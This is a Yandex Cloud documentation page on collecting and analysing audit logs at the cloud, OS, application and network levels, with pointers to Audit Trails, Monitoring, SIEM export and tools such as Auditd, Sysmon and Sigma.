Collecting, monitoring, and analyzing audit logs
An audit log is a record of all events in the system, including access to it and operations performed. By collecting and verifying audit logs, you can monitor compliance with the established security procedures and standards and identify vulnerabilities in your security mechanisms.
Events in audit logs occur on different levels:
- Yandex Cloud level: Events that occur with Yandex Cloud resources.
- OS level.
- Application level.
- Network level (Flow Logs).
Note
For more information about Kubernetes events, see Collecting, monitoring, and analyzing audit logs in Yandex Managed Service for Kubernetes.
Yandex Cloud level
Collecting events
The main tool for collecting Yandex Cloud level logs is Yandex Audit Trails. This service allows you to collect audit logs about events happening to Yandex Cloud resources and upload these logs to Yandex Object Storage buckets or Cloud Logging log groups for further analysis or export. For more information, refer to this guide on how to start collecting logs. You can also learn more about the event format or check out the event reference.
Note
See the Yandex Object Storage security guidelines in Object Storage.
To collect metrics, analyze Yandex Cloud-level events, and set up notifications, we recommend using Yandex Monitoring. It helps you track, for example, a sharp increase in the load on Compute Cloud, the number of Application Load Balancer requests per second (RPS), or significant changes in event statistics in Identity and Access Management.
You can also use Monitoring to monitor the health of the Audit Trails service itself and track security events.
You can export audit logs to a log group in Cloud Logging and to a customer's SIEM system to analyze information about events and incidents.
List of important Yandex Cloud-level events for search in audit logs:
Exporting events to SIEM
Audit Trails
Solutions for exporting Yandex Cloud audit logs are available for the following SIEM systems:
-
ArcSight
-
Splunk
Utilities like GeeseFS or s3fs can help set up export to any SIEM. They allow you to mount an Yandex Object Storage bucket as a VM's local disk. Next, you need to install a SIEM connector on the VM and configure reading JSON files from the bucket.
Metrics Yandex Monitoring
You can export metrics to a SIEM system via the API, see the instructions.
Responding to events
Using Yandex Cloud Functions, you can configure alerts about Audit Trails events, as well as automatic responses to malicious actions, including removing dangerous rules or revoking access rights.
OS level
When using IaaS cloud services and Kubernetes node groups, the customer is responsible for ensuring OS security and collecting OS-level events on their own. Free tools for collecting standard OS-generated events and exporting them to the customer's SIEM system include:
Additional event generation options can be implemented using Auditd for Linux or Sysmon for Windows.
You can collect Linux system metrics (CPU, RAM, and disk space usage) with Unified Agent Monitoring.
You can also export OS events to Cloud Logging using a Fluent Bit plugin
To describe events to be searched for in audit logs, we recommend using Sigma
Application level
Customers may collect events that occur at the level of applications deployed on Compute Cloud resources on their own. For example, save application logs to files and transfer them to a SIEM system using the tools listed in OS level above.
Network level
Currently, VPC network traffic event logs (Flow Logs) can only be collected by customers. You can use Yandex Cloud Marketplace solutions (such as NGFW, IDS/IPS, or network products) or free software for collecting and transmitting events.
Time synchronization
To get the exact time of OS- and application-level events, configure clock synchronization by following the instructions.